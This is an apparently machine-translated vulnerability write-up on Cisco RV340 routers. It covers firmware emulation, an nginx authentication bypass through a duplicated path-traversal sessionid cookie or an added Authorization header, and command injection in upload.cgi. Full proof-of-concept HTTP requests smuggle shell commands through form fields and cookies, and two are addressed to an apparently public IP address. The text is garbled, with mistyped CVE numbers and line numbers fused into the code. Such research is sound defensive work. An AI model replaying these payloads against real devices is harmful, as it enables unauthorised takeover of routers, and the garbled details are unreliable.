01 Introduction
This article is mainly based on the research and analysis of the Cisco RV340 command executing vulnerability (CVE-20122-20707). Although the use of this vulnerability requires identity verification, it can be achieved through CVE-20122-20705 to bypass the existing identity verification mechanism. Unconditional command execution. History-related vulnerabilities also include: CVE-2020-3451, CVE-2021-1473, CVE-2021-1472, we will analyze one by one.
02 Environment Construction
2.1 firmware download
can be downloaded to the firmware on the official website of cisco:
https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.26?catid=268437899
2.2 firmware decompression
Recommended 7Z-ZIP software to extract OpenWrt-Comcerto2000-HGW-ROOTFS-UBI_NAND.IMG
\RV34X-v1.0.03.22-2021-06-14-02-33-28-AM.img\RV34X-v1.0.03.22-2021-06-14-02-33-28-AM\fw.gz\fw\openwrt-comcerto2000-hgw-rootfs-ubi_nand.img
The UBI format IMG gets binwalk to decompress it, but here is a bit small pit. Binwalk will reset the soft link to/dev/null.
I forcibly bypass this logic by modifying the binwalk code:
binwalk/modules/extractor.py
2.3 QEMU system simulation
Modify the network configuration of the Ubuntu host, modify the system’s network interface configuration file/etc/network/interfaces.
Edit/ETC/QEMU-IFUP
Specific network configuration can refer to:
https://blog.csdn.net/QQ1084283172/article/details/69378333
Restart the virtual machine, because the network card of my Ubuntu host is NAT, and the bridge is to receive the nat network.
Download the corresponding Debian QEMU image
https://people.debian.org/~aurel32/qemu/armhf/
Start the QEMU virtual machine:
1 sudo qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=/dev/mmcblk0p2 console=tty0" -net nic -net tap -nographic Pass the solution to the QEMU virtual machine:
1 scp -r 1.tar [email protected]192.168.250.173:/root/Decodify and cut into the Chroot environment:
1 tar zxvf 1.tarchmod -R 777 rootfs2 cd rootfs3 sudo mount --bind /proc proc4 sudo mount --bind /dev dev5 chroot . /bin/sh
Gradually start the NGIX service:
1 /etc/init.d/boot boot2 generate_default_cert3 /etc/init.d/confd start4 /etc/init.d/nginx startTry to visit web page:
At this point, the simulation environment is completed, and the vulnerability test can be started.
2.4 debugging skills
Because CGI starts the request in the form of UWSGI sub -processes, requests a process at a time, using GDBSERVER is not good at ATTACH. Therefore, directly modify the binary file of the upload.cgi, modify the assembly and compilation of yourself at the main position of the main function, and get a dead cycle:
This process will always be stuck. Wait until the GDBSERVER Attach, and then modify the memory method to modify the code as the original order logic:
03 CVE-2022-20705
This vulnerability is an authorized vulnerability caused by improper nginx configuration. It is the pre-conditions used by the command executing vulnerability (CVE-20122-20707).
The
command to execute the vulnerability requires users to access the UPLOAD page, which is a page that requires power. Check the nginx configuration file and configuration reference relationship. The access to the/upload path is controlled by /var/nginx/conf.d/Web.upload.conf
1 location / form - file - upload {2 include uwsgi_params;3 proxy_buffering off;4 uwsgi_modifier1 9;5 uwsgi_pass 127.0.0.1 : 9003;6 uwsgi_read_timeout 3600;7 uwsgi_send_timeout 3600;8 }9 location / upload { set $deny 1;10 if ( - f / tmp / websession / token / $cookie_sessionid) {11 set $deny "0";12 }13 if ($deny = "1") {14 return 403;15 }16 upload_pass / form - file - upload;17 upload_store / tmp / upload;18 upload_store_access user: rw group: rw all: rw;19 upload_set_form_field $upload_field_name.name "$upload_file_name";20 upload_set_form_field $upload_field_name.content_type "$upload_content_type";21 upload_set_form_field $upload_field_name.path "$upload_tmp_path";22 upload_aggregate_form_field "$upload_field_name.md5""$upload_file_md5";23 upload_aggregate_form_field "$upload_field_name.size""$upload_file_size";24 upload_pass_form_field "^.*$";25 upload_cleanup 400 404 499 500 - 505;26 upload_resumable on; 27
As can be seen, nginx will be accessed by judging whether the/TMP/Websession/token/$ cookie_sessionid file exists. $ cookie_sessionid can be controlled by the cookies that we pass. We can set the value of $ cookie_sessionid to a must -exist, such as …../../../../etc/passwd, and you can bypass it by bypassing The judgment mechanism.
But in addition to the configuration of nginx, there is also a format check that passed into the cookie in the UPLOAD.CGI program, which is directly introduced ../../../../akes The format of the code side is verified:
else if ( !strcmp(v5, "/upload")&& HTTP_COOKIE&& strlen(HTTP_COOKIE) - 16 <= 0x40&& !match_regex("^[A-Za-z0-9+=/]*$", HTTP_COOKIE) ){v24 = v34;v25 = v35;v26 = (int)v32;v27 = StrBufToStr(v41);sub_12684(HTTP_COOKIE, v24, v25, v26, v27, v36, v37, v38);}
So is there any way to bypass Nginx’s authentication and at the same time meet the format of the code side?
The key to the
problem lies in the logic of getting cookies back end. Here the code obtains the value of the cookies through For loop, and it is partition when encountering the section:
if ( HTTP_COOKIE ) {StrBufSetStr(v40, HTTP_COOKIE);HTTP_COOKIE = 0;v13 = (char *)StrBufToStr(v40);for ( i = strtok_r(v13, ";", &save_ptr); i; i = strtok_r(0, ";", &save_ptr) ){sessionid = strstr(i, "sessionid=");if ( sessionid )HTTP_COOKIE = sessionid + '\n';}}}
In other words, we can pass two sessionids in the cookie,The previous one used to bypass Nginx, and the latter one to match the verification regularity of upload.cgi, the code will take the last sessionid as the parameter value of the transmission:
Cookie: sessionid=../../../etc/passwd;sessionid=Y2lzY28vMTI3LjAuMC4xLzEx;
So you can successfully bypass the authentication and enter the program logic of upload.cgi.
04 CVE-2022-20707
After bypassed the login restrictions through CVE-20122-20705, there is still an command to execute vulnerabilities in the upload.cgi itself.
Here is a very obvious command stitching. UPLOAD.CGI will process the parameters submitted to the request into json and are stitched into the command. Then we use ‘; {cmd};’ can successfully execute the command.
The parameters that can be received by
upload.cgi include:
1 jsonutil_get_string(dword_2324C, &v31, "\"file.path\"", -1);
2 jsonutil_get_string(dword_2324C, &haystack, "\"filename\"", -1);
3 jsonutil_get_string(dword_2324C, &v32, "\"pathparam\"", -1);
4 jsonutil_get_string(dword_2324C, &v33, "\"fileparam\"", -1);
5 jsonutil_get_string(dword_2324C, &v34, "\"destination\"", -1);
6 jsonutil_get_string(dword_2324C, &v35, "\"option\"", -1);
7 jsonutil_get_string(dword_2324C, &v36, "\"cert_name\"", -1);
8 jsonutil_get_string(dword_2324C, &v37, "\"cert_type\"", -1);
9 jsonutil_get_string(dword_2324C, &v38, "\"password\"", -1);
The CGI uses Nginx file upload module to obtain parameters, and some parameters are generated by the module. We try to choose parameters that do not affect the normal logic of the program for stitching, such as Destination and Option
The command execution string after stitching is as follows:
You can see that the command has been executed:
Bond the permissions of CVE-20122-20705 by bypasses, and finally the POC is:
1 POST /upload HTTP/1.12 Host: 192.168.250.1733 Content-Length: 7294 Accept: application/json, text/plain, */*5 optional-header: header-value6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.367 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryz6gIo5kcTkAlkCwX8 Origin: http://192.168.250.1739 Referer: http://192.168.250.173/index.html10 Accept-Encoding: gzip, deflate11 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.712 Cookie: sessionid=../../../etc/passwd;sessionid=Y2lzY28vMTI3LjAuMC4xLzEx; 13 Connection: close 14 15 ------WebKitFormBoundaryz6gIo5kcTkAlkCwX 16 Content-Disposition: form-data; name="sessionid" 1718 EU6DJKEIWO19 ------WebKitFormBoundaryz6gIo5kcTkAlkCwX20 Content-Disposition: form-data; name="pathparam" 2122 Firmware23 ------WebKitFormBoundaryz6gIo5kcTkAlkCwX24 Content-Disposition: form-data; name="fileparam" 2526 file00127 ------WebKitFormBoundaryz6gIo5kcTkAlkCwX28 Content-Disposition: form-data; name="destination"29 30 x';ls>/tmp/download/1.xml;'31 ------WebKitFormBoundaryz6gIo5kcTkAlkCwX32 Content-Disposition: form-data; name="option"33 34 x35 ------WebKitFormBoundaryz6gIo5kcTkAlkCwX36 Content-Disposition: form-data; name="file"; filename="1.img"37 Content-Type: application/octet-stream38 39 111140 ------WebKitFormBoundaryz6gIo5kcTkAlkCwX--
05 CVE-2020-3451
1.0.03.18 and the Nginx configuration in the previous version did not authorize the access to the access check. Select 1.0.00.33 for analysis. The version of the CGI does not have an authorized verification of the path.
CP command to be passed into FileParam during stitching
When the FileParam parameter is passed into a malicious stitching command, it can be executed
POC:
1 POST /upload HTTP/1.12 Connection: close3 Accept-Encoding: gzip, deflate4 Accept: application/json, text/plain, */*5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.366 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 Host: 186.86.126.88:4438 Content-Type: multipart/form-data; boundary=---------------------------421947719626410851953294897879 Content-Length: 61410 11 -----------------------------4219477196264108519532948978712 Content-Disposition: form-data; name="sessionid"13 14 FOOT15 -----------------------------4219477196264108519532948978716 Content-Disposition: form-data; name="fileparam"17 18 file001;ls>/www/download/3.xml;19 20 -----------------------------4219477196264108519532948978721 Content-Disposition: form-data; name="pathparam"22 23 Firmware24 -----------------------------4219477196264108519532948978725 Content-Disposition: form-data; name="file"; filename="1233.img"26 Content-Type: application/octet-stream27 28 11111111111111129 -----------------------------42194771962641085195329489787--
06 CVE-2021-1473 & CVE-2021-1472
1.0.03.20 version of the web.upload.conf as
1 location /form-file-upload { 2 include uwsgi_params;3 proxy_buffering off;4 uwsgi_modifier1 9;5 uwsgi_pass 127.0.0.1:9003;6 uwsgi_read_timeout 3600;7 uwsgi_send_timeout 3600;8 } 9location /upload {11 set $deny 1;12 13 if ($http_authorization != "") {14 set $deny "0";15 }16 17 if (-f /tmp/websession/token/$cookie_sessionid) {18 set $deny "0";19 }20 21 if ($deny = "1") {22 return 403;23 }24 25 upload_pass /form-file-upload;26 upload_store /tmp/upload;27 upload_store_access user:rw group:rw all:rw;28 upload_set_form_field $upload_field_name.name "$upload_file_name";29 upload_set_form_field $upload_field_name.content_type "$upload_content_type";30 upload_set_form_field $upload_field_name.path "$upload_tmp_path";31 upload_aggregate_form_field "$upload_field_name.md5" "$upload_file_md5";32 upload_aggregate_form_field "$upload_field_name.size" "$upload_file_size";33 upload_pass_form_field "^.*$";34 upload_cleanup 400 404 499 500-505;35 upload_resumable on;36 }
As long as you add Authorization to the head to make $ http_authorization is not empty, thereby bypass your identity verification.
When the version of the UPLOAD.CGI is performed by the CURL command stitching, A1 is passed into the sessionid in Cookie.
The final POC is:
1 POST /upload HTTP/1.12 Connection: close3 Accept-Encoding: gzip, deflate4 Accept: application/json, text/plain, */*5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.366 Host: 186.86.126.88:4437 Cookie: sessionid='&ls>/tmp/download/2.xml&';8 Authorization: YWRtaW46YWRtaW4=9 Content-Length: 57010 Content-Type: multipart/form-data; boundary=5097417339e2369be225700925a7175811 12 --5097417339e2369be225700925a7175813 Content-Disposition: form-data; name="sessionid"14 15 foobar16 --5097417339e2369be225700925a7175817 Content-Disposition: form-data; name="destination"18 19 x 20 --5097417339e2369be225700925a7175821 Content-Disposition: form-data; name="fileparam"22 23 Configuration24 --5097417339e2369be225700925a7175825 Content-Disposition: form-data; name="pathparam"26 27 Configuration28 --5097417339e2369be225700925a7175829 Content-Disposition: form-data; name="file"; filename="1233.xml"30 Content-Type: text/xml31 32 123333333 --5097417339e2369be225700925a71758--
07 Summary
Below the summary of the vulnerability of the upload.cgi series: